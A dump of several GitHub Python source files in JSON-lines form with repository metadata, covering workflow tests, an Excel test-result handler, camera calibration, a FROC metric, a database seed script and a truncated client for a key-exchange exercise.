6\n\n\n@pytest.mark.parametrize(\"nodes_lazy\", [True, False])\ndef test_workflow(nodes_lazy):\n def sum_node(a, b):\n return a + b\n\n @Workflow.from_func\n def my_workflow(a, b, c):\n first_sum = sum_node(a, b)\n return sum_node(first_sum, c)\n\n with temporal_context(context=Node.context, lazy=nodes_lazy):\n # It shouldn't matter whether nodes have lazy computation on or off for the working of the workflow\n with temporal_context(context=Workflow.context, lazy=True):\n val = my_workflow(a=2, b=3, c=4)\n assert isinstance(val, my_workflow)\n assert val.get() == 9\n\n with temporal_context(context=Workflow.context, lazy=False):\n val = my_workflow(a=2, b=3, c=4)\n assert val == 9\n\n\ndef test_instance_context():\n @Node.from_func\n def sum_node(a, b):\n return a + b\n\n sum_node.context.update(lazy=True)\n\n # By default, an instance should behave as the class context specifies,\n # so in this case the node should not automatically recalculate\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 5\n\n val.update_inputs(a=8)\n assert val._nupdates == 1\n\n # However, we can set a specific context for the instance.\n val2 = sum_node(a=2, b=3)\n assert isinstance(val2, sum_node)\n assert val2.get() == 5\n\n val2.context.update(lazy=False)\n\n val2.update_inputs(a=8)\n assert val2._nupdates == 2\n\n # And it shouldn't affect the other instance\n val.update_inputs(a=7)\n assert val._nupdates == 1\n\n\n@pytest.mark.parametrize(\"lazy_init\", [True, False])\ndef test_default_context(lazy_init):\n \"\"\"Test that the default context is set correctly for a node class.\"\"\"\n\n @Node.from_func\n def calc(val: int):\n return val\n\n @Node.from_func(context={\"lazy\": False, \"lazy_init\": lazy_init})\n def alert_change(val: int):\n ...\n\n val = calc(1)\n\n init_nupdates = 0 if lazy_init else 1\n\n # We feed the node that produces the intermediate value into our alert node\n my_alert = alert_change(val=val)\n\n val.get()\n assert my_alert._nupdates == init_nupdates\n val.update_inputs(val=2)\n assert my_alert._nupdates == init_nupdates + 1\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/nodes/tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"11343115520","text":"from openpyxl import *\nfrom openpyxl.styles import Alignment, PatternFill\nfrom datetime import *\nimport globals\n\n\nConfigWB = load_workbook(filename=globals.ConfigPath)\nPathWS = ConfigWB['PATHS']\nEtcWS = ConfigWB['ETC']\nProjectsWS = ConfigWB['PROJECTS']\nProjectPath = PathWS.cell(row=1, column=2).value\nTestResultPath = PathWS.cell(row=2, column=2).value\nWaitTime = EtcWS.cell(row=1,column=2).value\nDriverPath = globals.ProjectPath + \"etc\\\\chromedriver.exe\"\nwb = load_workbook(filename=globals.test_suite_path)\nws = wb[globals.test_sheet]\ntotal_cases = int(str(ws.cell(row=ws.max_row, column=1).value).strip())\nRepoSheet = wb['REPO']\n\ndef get_test_data(test_id,test_step):\n row_no = 3\n end_row = ws.max_row\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n test_data = str(ws.cell(row=row_no, column=4).value).strip()\n return test_data\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n\ndef test_status(test_id,test_step,test_status):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n if test_status.lower() == 'pass':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='0000FF00',end_color='0000FF00',fill_type='solid')\n if test_status.lower() == 'fail':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='FFFF0000',end_color='FFFF0000',fill_type='solid')\n if test_status.lower() == 'pending':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='00FFFF00',end_color='00FFFF00',fill_type='solid')\n ws.cell(row=row_no, column=9).value = test_status\n ws.cell(row=row_no, column=10).value = datetime.now()\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n save_test_resut(ws)\n\n\ndef AutomationException(test_id,test_step,exception):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n ws.cell(row=row_no, column=11).value = exception\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n save_test_resut(ws)\n\n\ndef WriteTestparameters(test_id,test_step,**kwargs):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n col=12\n for key, value in kwargs.items():\n ws.cell(row=row_no, column=col).value = key + \"=\" + value\n col = col + 1\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n save_test_resut(ws)\n\ndef get_element_repo(ElementName):\n row_no = 2\n end_row = RepoSheet.max_row\n while row_no <= RepoSheet.max_row:\n\n if ElementName == str(RepoSheet.cell(row=row_no, column=2).value).strip():\n IdentifierType = str(RepoSheet.cell(row=row_no, column=3).value).strip()\n ElementType = str(RepoSheet.cell(row=row_no, column=4).value).strip()\n ElementIdentifier = str(RepoSheet.cell(row=row_no, column=5).value).strip()\n Action = str(RepoSheet.cell(row=row_no, column=6).value).strip()\n #print(ElementName, IdentifierType, ElementType, ElementIdentifier, Action)\n return IdentifierType, ElementType, ElementIdentifier, Action\n row_no = row_no + 1\n\ndef get_expected_result(test_id, test_step):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n expected_result = str(ws.cell(row=row_no, column=8).value).strip().split('::')[2]\n expected_result_variables = expected_result.split(' == ')[0]\n expected_result_values = expected_result.split(' == ')[1]\n expected_result_variable_list = expected_result_variables.split(';;')\n expected_values_list = expected_result_values.split(';;')\n row_no = row_no + 1\n for n in range(0,len(expected_result_variable_list)):\n expected_result_variable_list[n] = expected_result_variable_list[n].split('||')\n expected_values_list[n] = expected_values_list[n].split('||')\n return expected_result_variable_list, expected_values_list\n\ndef compare_actual_and_excepted_result(test_id, test_step, expected_result_variable_list, expected_values_list, actual_value_list):\n #print(expected_result_variable_list, expected_values_list, actual_value_list)\n test_result = True\n for n in range(len(expected_result_variable_list)):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n print_text = ''\n my_test_result = False\n ws.cell(row=row_no, column=n+12).fill = PatternFill(start_color='FFFF0000',end_color='FFFF0000',fill_type='solid')\n for m in range(0,len(expected_result_variable_list[n])):\n print_text = print_text + (expected_result_variable_list[n])[m] + \": EXPECTED= '\" + (expected_values_list[n])[m] + \"' ACTUAL= '\" + (actual_value_list[n])[m] + \"'\" + ' OR' + '\\n'\n if (expected_values_list[n])[m] == (actual_value_list[n])[m]:\n my_test_result = True\n ws.cell(row=row_no, column=n+12).fill = PatternFill(start_color='0000FF00',end_color='0000FF00',fill_type='solid')\n ws.cell(row=row_no, column=n+12).alignment = Alignment(wrap_text=True)\n ws.cell(row=row_no, column=n+12).value = print_text\n test_result = my_test_result * test_result\n #print(print_text)\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n save_test_resut(ws)\n if test_result:\n test_status(test_id,test_step,'PASS')\n else:\n test_status(test_id,test_step,'FAIL')\n\n\ndef save_test_resut(ws):\n wb.save(str(globals.ProjectPath) + \"\\\\test_suite\\\\\" + str(globals.project) + \"\\\\\" + str(globals.test_sheet) + \"_test_result.xlsx\")\n\nwb.close()\n","repo_name":"smackchis/jatayu","sub_path":"test_sheet_handler.py","file_name":"test_sheet_handler.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14331366638","text":"def __init__(self):\n self.url = 'https://mariamingallonmm.github.io/AI-SearchAlgorithm-A2-2048puzzle/'\n self.driver = webdriver.Chrome(ChromeDriverManager().install()) # Optional argument, if not specified will search path.\n self.driver.get(self.url)\n self.body = self.driver.find_element_by_tag_name('body')\n self.moves = {\n 0: Keys.ARROW_UP,\n 1: Keys.ARROW_DOWN,\n 2: Keys.ARROW_LEFT,\n 3: Keys.ARROW_RIGHT\n }\n","repo_name":"mariamingallonMM/AI-SearchAlgorithm-A2-2048puzzle","sub_path":"GameManager_init.py","file_name":"GameManager_init.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"28328359248","text":"''' A Class to Perform Calibration '''\n\n\nimport os\nimport numpy as np\nimport glob\nimport logging\nimport random\nimport matplotlib.pyplot as plt\nimport sys\n\nfrom models.GetSubPixel import GetSubPixels\nfrom models.OpenCVCalibGivenPoints import CalibGivenPoints\nfrom settings.settings import *\nfrom utils.utils import *\n\nclass Calib(object):\n \"\"\"Perform Calibration\n \"\"\"\n def __init__(self, img_size, log_name= ''):\n \"\"\"\n Args;\n img_size = [x_size, y_size]\n \"\"\"\n self.subpixel_exactor = GetSubPixels(save_path='',show_flag=False)\n\n self.chessboardsize = chessboardsize\n self.calibtor = CalibGivenPoints(chessboardsize, '', 40)\n\n self.size = 480\n self.img_size = img_size\n self.x_ratio = self.size / img_size[0]\n self.y_ratio = self.size / img_size[1]\n self.corner_num = corner_num\n self.img_path = r''\n self.log_file_path = os.path.join(LOGFILEPATH, 'calib_'+log_name+'.txt')\n log_init(self.log_file_path)\n\n def load_heatmaps(self, heatmap_list):\n \"\"\"load imgs by list\n \"\"\"\n img_num = len(heatmap_list)\n heatmaps = []\n heatmap_names = []\n\n for heatmap_name in heatmap_list:\n heatmap_temp = np.load(heatmap_name)\n # name_temp = heatmap_name.split('/')[-1] # mac\n name_temp = heatmap_name.split('\\\\')[-1] # win\n heatmaps.append(heatmap_temp)\n heatmap_names.append(name_temp)\n \n return heatmaps, heatmap_names\n \n def get_coor_from_heatmap(self, heatmap, name, sort_mod='gt', ORT=20, ref_path='', img_path='', show_flag=False):\n \"\"\"For a single heatmap\n Args:\n name: index.npy\n Returns:\n cs: ndarray 30x2\n \"\"\"\n corner_flag = False\n self.subpixel_exactor.load_distribution_map(name, heatmap, self.corner_num, chessboardsize)\n flag, cand = self.subpixel_exactor.thredshold_locate()\n if not flag:\n cs, s_err = self.subpixel_exactor.sub_pixel_localization(cand)\n if s_err > ORT:\n pass\n else:\n gt = os.path.join(ref_path, name)\n self.subpixel_exactor.load_gt_4_calibsort(gt)\n if sort_mod == 'gt':\n cs = self.subpixel_exactor.sort_by_gt_data(show_flag=False)\n cs = self.subpixel_exactor.collineation_refinement(cs)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = True\n elif sort_mod == 'corner':\n img_name = os.path.join(img_path, name.split('.')[0]+\".jpg\")\n img = cv2.imread(img_name)\n self.subpixel_exactor.opencv_find_corner(img)\n cs = self.subpixel_exactor.sort_by_corners()\n cs = self.subpixel_exactor.collineation_refinement(cs)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = True\n elif sort_mod == 'OR':\n img_name = os.path.join(img_path, name.split('.')[0]+\".jpg\")\n img = cv2.imread(img_name)\n flag, cs = self.subpixel_exactor.run_OR(heatmap, img)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = flag\n cs = np.array(cs)\n else:\n return corner_flag, None\n\n return corner_flag, cs\n \n\n def get_coors_from_heatmap_list(self, heatmap_list, sort_mod='gt', ORT=20, ref_path='', img_path=''):\n \"\"\"\n Returns:\n names: [index.npy, ...]\n \"\"\"\n pose_num = len(heatmap_list)\n corners = []\n names = []\n \n for i in range(pose_num):\n heatmap = np.load(heatmap_list[i])\n name = heatmap_list[i].split('\\\\')[-1]\n corner_flag, cs = self.get_coor_from_heatmap(heatmap, name, sort_mod=sort_mod, ORT=ORT, ref_path=ref_path, img_path=img_path)\n if corner_flag:\n corners.append(cs.astype('float32'))\n names.append(name)\n \n return corners, names\n \n def calib(self, heatmap_list, sort_mod='gt', ORT=20, img_path='', ref_path='',fix_CM_flag=False, f=0, p=0):\n \"\"\"calib with a set of heatmaps\n \"\"\"\n img_num = len(heatmap_list)\n\n heatmaps, heatmap_names = self.load_heatmaps(heatmap_list)\n corners = []\n corner_names = []\n print('Get sub-pixel corners...')\n for i, heatmap in enumerate(heatmaps):\n flag, cs = self.get_coor_from_heatmap(heatmap, heatmap_names[i], sort_mod, ORT, ref_path, img_path)\n if flag:\n corners.append(cs.astype('float32'))\n corner_names.append(heatmap_names[i])\n else:\n img_num -= 1\n self.calibtor.img_number = img_num\n self.calibtor.get_o_points()\n print(f'Calibration with {img_num} images.')\n self.calibtor.img_points = corners\n if fix_CM_flag:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(f,p)\n \n else:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calibrate()\n \n return ret, mtx, dist, rvecs, tvecs\n\n def calib_by_subpixel_res(self,subpixel_list, fix_flag=False, fx=0, fy=0, px=0, py=0):\n \"\"\"\n \"\"\"\n corners = []\n pose_num = len(subpixel_list)\n for subpixel in subpixel_list:\n cs_t = np.load(subpixel)\n corners.append(cs_t.astype('float32')) \n\n self.calibtor.img_number = pose_num\n self.calibtor.get_o_points()\n print(f'Calibration with {pose_num} images.')\n self.calibtor.img_points = corners\n if fix_flag:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(fx,fy,px,py)\n else:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calibrate()\n \n return ret, mtx, dist, rvecs, tvecs\n\n def save_subpixel_corners(self, heatmap_path, sort_mod='gt', ORT=20, ref_path='', img_path='', save_path=r''):\n \"\"\"save subpixel coordinates\n \"\"\"\n heatmap_list = self.get_all_heatmaps(heatmap_path)\n corners, names = self.get_coors_from_heatmap_list(heatmap_list, sort_mod, ORT, ref_path, img_path)\n for i, corner in enumerate(corners):\n np.save(os.path.join(save_path, names[i]), corner)\n \n print(f'save subpixel corners in {save_path}')\n\n def calib_by_RANSAC_practical(self, heatmap_folder, subpixel_path, max_iter_num=100, least_pose_num=20, outlier_threshold=0.8, inlier_threshold=2/3, sort_mod='gt', ORT=20, ref_path=r'', ref_mod='gt',save_flag=False, draw_flag=False):\n \"\"\"\n Args:\n least_pose_num : use <=* images to calib every time\n outlier_threshold : if RPE > *, set it as outlier\n inlier_threshold: if inliers numbers > (* x img_num) -> stop calib \n \"\"\"\n if save_flag:\n self.save_subpixel_corners(heatmap_folder, sort_mod,ORT,ref_path,save_path=subpixel_path)\n \n heatmap_list = glob.glob(os.path.join(heatmap_folder,'*.npy'))\n subpixel_list = glob.glob(os.path.join(subpixel_path,'*.npy'))\n total_num = len(heatmap_list)\n assert total_num > least_pose_num, 'Images Not Enough!'\n\n inlier_num = 0\n inlier_max = 0\n best_models = [] \n inlier_max_ip_error = 0\n iter_count = 0\n IPs = []\n I_nums = []\n inlier_num_threshold = int(inlier_threshold * total_num)\n\n while inlier_num < inlier_num_threshold and iter_count < max_iter_num:\n # get poses\n pose_list = self.__choose_pose_randomly(subpixel_path, least_pose_num)\n\n # calib to get K\n ret, mtx, _, _, _ = self.calib_by_subpixel_res(pose_list)\n fx = mtx[0,0]\n fy = mtx[1,1]\n px = mtx[0,2]\n py = mtx[1,2]\n\n # calib all fix K get Rs,ts\n print('Counting inliers...')\n _, _, dist, rvecs, tvecs = self.calib_by_subpixel_res(subpixel_list,fix_flag=True,fx=fx,fy=fy,px=px,py=py)\n\n # calculate RPEs\n RPEs = self.calibtor.call_re_projection_errors(rvecs,tvecs,mtx,dist)\n\n # count inlier numbers\n count = 0\n for RPE in RPEs:\n # print(RPE)\n if RPE < outlier_threshold:\n count+=1\n\n # change vars\n inlier_num = count\n if inlier_num > inlier_max:\n inlier_max = inlier_num\n # inlier_max_ip_error = e_ip\n best_models = []\n best_models.append(mtx)\n elif inlier_num == inlier_max:\n best_models.append(mtx)\n iter_count+=1\n\n return best_models\n \n def calib_RANSAC_OpenCV(self,img_folder, max_iter_num=3, least_pose_num=20, outlier_threshold=0.1, inlier_threshold=2/3):\n \"\"\"\n You are recommended to use large max_iter_num to acquire better model.\n Args:\n least_pose_num : use <= ([]ximages) to calib every time\n outlier_threshold : if RPE > [], set it as outlier\n inlier_threshold: if inliers numbers > ([] x img_num) -> stop calib \n Returns:\n a list of Intrinsic parameters with max Inlier number\n You should choose one of them and NOT choose the one much different from others.\n \"\"\"\n \n img_list = glob.glob(os.path.join(img_folder,'*.jpg'))\n total_num = len(img_list)\n assert total_num > least_pose_num, 'Images Not Enough!'\n\n inlier_num = 0\n inlier_max = 0\n best_models = []\n inlier_max_ip_error = 0\n iter_count = 0\n IPs = []\n I_nums = []\n inlier_num_threshold = int(inlier_threshold * total_num)\n\n while inlier_num < inlier_num_threshold and iter_count < max_iter_num:\n # get poses\n img_list_per_calib = self.__choose_img_randomly(img_list, least_pose_num)\n\n # calib to get K\n self.calibtor.load_imglist(img_list_per_calib)\n self.calibtor.get_points_by_images()\n ret, mtx, _, _, _ = self.calibtor.calibrate()\n fx = mtx[0,0]\n fy = mtx[1,1]\n px = mtx[0,2]\n py = mtx[1,2]\n\n # calib all fix K get Rs,ts\n print('Counting inliers...')\n self.calibtor.load_imglist(img_list)\n self.calibtor.get_points_by_images()\n _, _, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(fx=fx,fy=fy,px=px,py=py)\n\n # calculate RPEs\n RPEs = self.calibtor.call_re_projection_errors(rvecs,tvecs,mtx,dist)\n\n # count inlier numbers\n count = 0\n for RPE in RPEs:\n # print(RPE)\n if RPE < outlier_threshold:\n count+=1\n\n # print(f'{count} inliers with IP error = {e_ip}')\n\n # change vars\n inlier_num = count\n if inlier_num > inlier_max:\n best_models = []\n inlier_max = inlier_num\n # inlier_max_ip_error = e_ip\n best_models.append(mtx)\n elif inlier_num == inlier_max:\n best_models.append(mtx)\n iter_count+=1\n print(f'{iter_count} iter with max {inlier_max} inliers')\n\n return best_models\n \n def __call_inliers_num(self, RPEs, threshold):\n \"\"\"\n \"\"\"\n count = 0\n for rpe in RPEs:\n if rpe > threshold:\n count+=1\n return count\n\n def draw_error_distribution(self, errs_f, errs_p):\n \"\"\"\n \"\"\"\n plt.plot(errs_f, errs_p, 'ro')\n plt.show()\n\n def draw_ret_and_err_ip_distribution(self, errs_ip, rets):\n \"\"\"\n \"\"\"\n plt.plot(errs_ip, rets, 'ro')\n plt.xlabel('Intrinsic parameters error')\n plt.ylabel('Reprojection error')\n plt.show()\n\n def __choose_img_randomly(self, img_list, max_num):\n \"\"\"get a name list of files (subpixel corners) in a given folder\n Args:\n folder: file folder path\n \"\"\"\n name_list = []\n pose_num = random.randint(3,max_num)\n # all_imgs= glob.glob(os.path.join(folder, '*.jpg'))\n\n\n for i in range(pose_num):\n pose_index = random.randint(0,pose_num-1)\n name_temp = img_list[pose_index]\n if name_temp not in name_list:\n name_list.append(name_temp)\n \n return name_list\n\n def __choose_pose_randomly(self, folder, max_num):\n \"\"\"get a name list of files (subpixel corners) in a given folder\n Args:\n folder: file folder path\n \"\"\"\n name_list = []\n pose_num = random.randint(3,max_num)\n all_subpxiels = glob.glob(os.path.join(folder, '*.npy'))\n\n\n while(len(name_list) < pose_num):\n pose_index = random.randint(0,pose_num-1)\n name_temp = all_subpxiels[pose_index]\n if name_temp not in name_list:\n name_list.append(name_temp)\n \n return name_list\n \n def get_all_heatmaps(self, folder):\n \"\"\"\n Args:\n folder : /root/DetectRes/heatmap\n \"\"\"\n heatmap_list = glob.glob(os.path.join(folder, '*.npy'))\n\n return heatmap_list\n \n def show_accuracy_by_gt(self, gt_path=r'', mtx=None):\n \"\"\"\n \"\"\"\n gt_list = glob.glob(os.path.join(gt_path,'*.npy'))\n gt_temp = np.load(gt_list[0],allow_pickle=True)\n gt_temp = gt_temp.item()\n K_gt = gt_temp['K']\n err_f, err_p, err_ip = self.cal_accuracy_by_gt(gt_path,mtx)\n print(f'The ground truth intrinsic matrix is {K_gt}')\n print(f'The focal length error = {err_f}')\n print(f'The principle points error = {err_p}')\n print(f'The intrinsic parameters error = {err_ip}')\n\n\n return err_f, err_p, err_ip\n\n def cal_accuracy_by_ref_K(self, ref_K, mtx):\n \"\"\"\n \"\"\"\n K_gt = ref_K\n fx_gt = K_gt[0,0]\n fy_gt = K_gt[1,1]\n px_gt = K_gt[0,2]\n py_gt = K_gt[1,2]\n\n fx_pred = mtx[0,0]\n fy_pred = mtx[1,1]\n px_pred = mtx[0,2]\n py_pred = mtx[1,2]\n\n err_f = (abs(fx_pred-fx_gt)+abs(fy_pred- fy_gt))/2\n err_p = (abs(px_pred-px_gt)+abs(py_pred- py_gt))/2\n err_ip = (err_f+err_p)/2\n\n return err_f, err_p, err_ip\n\n def show_accuracy_by_ref_K(self,ref_K, mtx):\n err_f, err_p, err_ip = self.cal_accuracy_by_ref_K(ref_K, mtx)\n print(f'The ground truth intrinsic matrix is {ref_K}')\n print(f'The focal length error = {err_f}')\n print(f'The principle points error = {err_p}')\n print(f'The intrinsic parameters error = {err_ip}')\n \n def cal_accuracy_by_gt(self, gt_path=r'', mtx=None):\n\n gt_list = glob.glob(os.path.join(gt_path,'*.npy'))\n gt_temp = np.load(gt_list[0],allow_pickle=True)\n gt_temp = gt_temp.item()\n\n K_gt = gt_temp['K']\n fx_gt = K_gt[0,0]\n fy_gt = K_gt[1,1]\n px_gt = K_gt[0,2]\n py_gt = K_gt[1,2]\n\n fx_pred = mtx[0,0]\n fy_pred = mtx[1,1]\n px_pred = mtx[0,2]\n py_pred = mtx[1,2]\n\n err_f = (abs(fx_pred-fx_gt)+abs(fy_pred- fy_gt))/2\n err_p = (abs(px_pred-px_gt)+abs(py_pred- py_gt))/2\n err_ip = (err_f+err_p)/2\n\n\n return err_f, err_p, err_ip\n\n def post_process(self, mtxs):\n \"\"\"\n \"\"\"\n mtxs_fix = []\n for mtx in mtxs:\n fx = mtx[0,0]\n fy = mtx[1,1]\n px = mtx[0,2]\n py = mtx[1,2]\n\n fx *= self.x_ratio\n px *= self.x_ratio\n fy *= self.y_ratio\n py *= self.y_ratio\n\n mtx_fix = [ [fx, 0, px], \n [0 ,fy, py], \n [0, 0, 1]]\n\n mtxs_fix.append(mtx_fix)\n\n return mtxs_fix \n\n\n\n\n\nif __name__ == '__main__':\n test = Calib(img_size=[480,480] ,log_name='test')\n root_path = r''\n heatmap_folder = r''\n ref_path = r''\n img_folder = r'D:\\DeepCalib\\CCS\\Datasets\\demo_iter_1\\img'\n mtxs = test.calib_RANSAC_OpenCV(img_folder)\n mtxs = test.post_process(mtxs)\n print(mtxs)\n \n","repo_name":"Easonyesheng/CCS","sub_path":"calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":16575,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"238712259","text":"#!/usr/bin/env python\r\nimport numpy as np\r\nfrom scipy import interpolate\r\nfrom matplotlib import pyplot as plt\r\n\r\npredefined_fp = [1/4, 1/2, 1, 2, 4, 8]\r\n\r\ndef froc(\r\n tp_prob: np.array,\r\n fp_prob: np.array,\r\n \r\n gt_count: int,\r\n image_count: int,\r\n \r\n predefined_fp: np.array\r\n ):\r\n \"\"\"\r\n Free-ROC\r\n \r\n Args:\r\n tp_prob: np.array\r\n fp_prob: np.array, \r\n gt_count: int, number of ground truth bounding box\r\n image_count: int, number of image samples\r\n predefined_fp: np.array, predifined fp/img\r\n \r\n Returns:\r\n score: float \r\n \"\"\"\r\n assert gt_count >= len(tp_prob), \"There cannot be more true guesses than numbers of ground truth.\"\r\n \r\n join_probs = np.unique(np.concatenate((tp_prob, fp_prob))) # consider rounding to make this operation faster.\r\n join_probs = np.around(join_probs, decimals=8)\r\n \r\n if len(join_probs) == 0:\r\n return 0 # no score for not guess anything\r\n if gt_count == 0:\r\n assert image_count == 0, 'Ground truth count is 0 but image count is not ??'\r\n return 0\r\n \r\n # accumulate the count, there is another algorithm for this but we ignore first.\r\n tp_count = np.zeros(len(join_probs))\r\n fp_count = np.zeros(len(join_probs))\r\n \r\n for idx, join_prob in enumerate(join_probs):\r\n tp_count[idx] = np.count_nonzero(tp_prob >= join_prob)\r\n fp_count[idx] = np.count_nonzero(fp_prob >= join_prob)\r\n tp_rate = tp_count / gt_count\r\n fp_per_img = fp_count / image_count\r\n tp_rate = np.append(tp_rate, 0)[::-1]\r\n fp_per_img = np.append(fp_per_img,0)[::-1]\r\n \r\n predefined_fp = np.sort(predefined_fp)\r\n interpolation_function = interpolate.interp1d(fp_per_img, tp_rate, fill_value=(0, max(tp_rate)), bounds_error=False)\r\n \r\n xnew = np.arange(0, 10, 0.01)\r\n ynew = interpolation_function(xnew) # use interpolation function returned by `interp1d`\r\n plt.plot(xnew, ynew, '-')\r\n \r\n axes = plt.gca()\r\n axes.set_xlim([0, 10])\r\n \r\n plt.legend(['NSCLC', 'SCLC', 'SCC', 'AC'])\r\n plt.xlabel('False Positive per Image')\r\n plt.ylabel('Recall')\r\n \r\n plt.savefig(f'./froc.png')\r\n \r\n return sum(\r\n interpolation_function(predefined_fp)\r\n ) / len(predefined_fp) # get the average of these interpolations,\r\n\r\n \r\n \r\n","repo_name":"Wsine/mindspore2021","sub_path":"evaluate/froc.py","file_name":"froc.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33216256029","text":"\"\"\" Script to seed database. \"\"\"\n\nimport os\nimport json\nfrom random import choice, randint\n\nimport crud\nimport model\nimport server\n\nos.system('dropdb affirmations_db')\nos.system('createdb affirmations_db')\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\nwith open('data/messages.json') as f:\n message_data = json.load(f)\n\nmessages_in_db = []\nfor message in message_data:\n message_author = message['Author']\n message_text = message['Text']\n\n db_message = crud.create_message(message_author, message_text)\n \n messages_in_db.append(db_message)\n\n\nfname = model.User.fname\nphone_num = model.User.phone_num\nuser = crud.create_user(fname, phone_num)\n\n# for message in sent messages:\n # if user has received that message:\n # create instance of user_message\n# user_message = crud.create_user_message(user, db_message)","repo_name":"ainethompson/affirmations","sub_path":"seed_database.py","file_name":"seed_database.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12566775123","text":"import socket\r\nfrom Crypto.Cipher import DES, AES, PKCS1_OAEP\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Signature import pkcs1_15\r\nfrom Crypto.Hash import SHA256\r\nfrom Crypto.Util.Padding import pad, unpad\r\nimport hashlib\r\nimport hmac\r\nimport time\r\nfrom Crypto.Random import get_random_bytes\r\nimport string\r\nimport random\r\n\r\nHOST = '127.0.0.1' # IP address for server socket\r\nPORT = 65432 # port for server socket\r\nnetworkAddress = HOST + PORT.__str__()\r\nBLOCK_SIZE = 32\r\nclient1_id = 'ID-Client1'\r\napplicationServer_id = 'ID-Server'\r\ncentralizedCertificateAuthority_id = 'ID-CA'\r\nreq = 'memo'\r\nsessionLifetime = 86400\r\n\r\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as applicationServer:\r\n applicationServer.connect((HOST, PORT))\r\n print('\\nClient is running...')\r\n print('\\nConnected to application server using IP address \"{}\" - port \"{}\"...'.format(HOST, PORT))\r\n\r\n # Client Registration; construction and sending of message content (3)\r\n # (Client -> Application Server)\r\n # Constructed message contents:\r\n # [Application Server ID||Timestamp3]\r\n timestamp3 = time.time().__trunc__()\r\n message3 = applicationServer_id + timestamp3.__str__()\r\n encodedMessage3 = message3.encode(\"utf-8\")\r\n applicationServer.sendall(encodedMessage3)\r\n\r\n # Client Registration; reception and parsing of message content (4)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [Application Server Public-Key||Certificate||Timestamp4]\r\n receivedData4 = applicationServer.recv(4096)\r\n receivedDataDecoded4 = receivedData4.decode(\"utf-8\")\r\n receivedTimestamp4 = receivedDataDecoded4[-10:]\r\n upperBoundApplicationServerPublicKey = receivedDataDecoded4.rindex(\"END PUBLIC KEY-----\") + 17\r\n lowerBoundApplicationServerPublicKey = receivedDataDecoded4.find(\"-----BEGIN PUBLIC KEY\")\r\n receivedApplicationServerPublicKey = \\\r\n receivedDataDecoded4[lowerBoundApplicationServerPublicKey:upperBoundApplicationServerPublicKey]\r\n print('\\nReceived plaintext from application server: \"{}\" (Step 4)'.format(receivedDataDecoded4))\r\n certificate = receivedDataDecoded4.replace(receivedTimestamp4, '').replace(receivedApplicationServerPublicKey, '')\r\n\r\n # Verification of received application server public-key and certificate\r\n\r\n # Client Registration; second construction and sending of message content (5)\r\n # (Client -> Application Server)\r\n # Constructed message contents:\r\n # [Temporary Key2||Client ID||Client IP Address||Client Port||Timestamp5]\r\n letters = string.ascii_lowercase\r\n client_tk = (''.join(random.choice(letters) for i in range(8)))\r\n print('\\nSecond temporary-key generated: \"{}\" (Step 5)'.format(client_tk))\r\n timestamp5 = time.time().__trunc__()\r\n message5 = client_tk + 